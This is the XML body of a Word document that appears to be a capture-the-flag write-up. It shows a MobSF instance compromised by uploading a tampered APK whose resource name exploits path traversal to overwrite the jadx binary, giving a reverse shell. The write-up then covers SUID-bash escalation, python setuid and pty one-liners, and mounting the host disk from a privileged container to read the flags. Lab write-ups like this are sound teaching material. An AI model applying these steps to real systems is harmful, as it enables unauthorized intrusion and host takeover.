          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../Mobile-Security-Framework-MobSF/mobsf/StaticAnalyzer/tools/jadx/bin/jadx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5910263" cy="3949647"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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10263" cy="394964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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.jfmpylp9nilw" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 - Name value modified to exploit Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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Click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File → Save</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and overwrite the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resources.arsc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to save the updated </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value. Finally, we compile the apk again using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apktool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as shown in Figure 11.</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apktool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poc.apk</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Figure 11 - Recompiling the modified application into exploit.apk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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start a listener on port 80 and upload the exploit.apk file to the MobSF application.</w:t>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rlwrap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-nvlp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After uploading the file, we receive a shell on our listener, as shown in Figures 12 and 13.</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0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4010025" cy="2043462"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="37" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="10741" l="7258" r="0" t="11099"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4010025" cy="204346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B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.aq51gihcni3l" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 - Uploading the malicious exploit.apk file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4505325" cy="925118"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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505325" cy="92511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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7fdgrwabdd6o" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 13 - Receiving the reverse connection on the listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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obtain the user flag, simply navigate to the /</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">home/mobsf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user.txt file.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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2791936" cy="1845021"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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791936" cy="184502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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.2qww565m6i5k" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 14 - Capturing the user flag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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.m2qfaf94bquq" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>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enumerate binaries that have the SUID permission set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:jc w:val="center"/>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3414713" cy="1562818"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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14713" cy="15628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240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.utw9e7pnrt2b" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 15 - Enumeration of binaries with SUID permission</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see that bash has this permission, as shown in Figure 16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4495800" cy="466725"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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495800" cy="4667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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.mieu2sh06cux" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16 - Bash binary with SUID permission, represented by the letter ‘s’ after -rw</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to escalate privileges inside the container, simply execute:</w:t>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240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5048250" cy="704850"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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048250" cy="7048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pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.weo4ry90vc2a" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 17 - Exploiting bash SUID permission to become root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">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However, after running the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command, we notice that the user’s uid is still mobsf, meaning we cannot fully use root privileges. To resolve this, we can use Python to upgrade the terminal and adjust the uid.</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pty;pty.spawn('/bin/bash')"</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os;os.setuid(0);os.system('/bin/bash')"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5795963" cy="854834"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="45"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795963" cy="85483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pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ih59ibj86ytn" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 18 - Upgrading the terminal to full TTY and setting uid to 0</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observe that we are able to list disks and the /dev directory. We can test whether the container is running with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag, which would allow us to mount the host’s disk inside the container.</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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5562600" cy="3142149"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="46" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="9123" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5562600" cy="314214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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.v8grijyltds" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 19 - Listing files and directories in /dev</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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3705225" cy="1025636"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="47"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705225" cy="10256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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.oerykypp6dx9" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 20 - Listing the machine’s disks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploit the privileged container</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can mount </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a directory we control, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/pasta.</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mkdir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/mnt/pasta</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/mnt/pasta</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4838700" cy="986999"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="48"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838700" cy="98699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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.cxsrjek020kv" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 21 - Mounting /dev/root into the created /mnt directory</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that, we gain access to the host’s disk from within the container and can read the root flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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/mnt/pasta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6">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8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root.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3119438" cy="1045172"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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119438" cy="104517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pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nkqtlovdlnl9" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 22 - Retrieving the root flag</w:t>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spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.pz4byfdv6sq4" w:id="28"/>
    <w:bookmarkEnd w:id="2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-866773</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="34"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D">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842519685038pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image1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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="43"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25"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Mob</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-334960</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="3001873"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="25"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67500" cy="3001873"/>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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
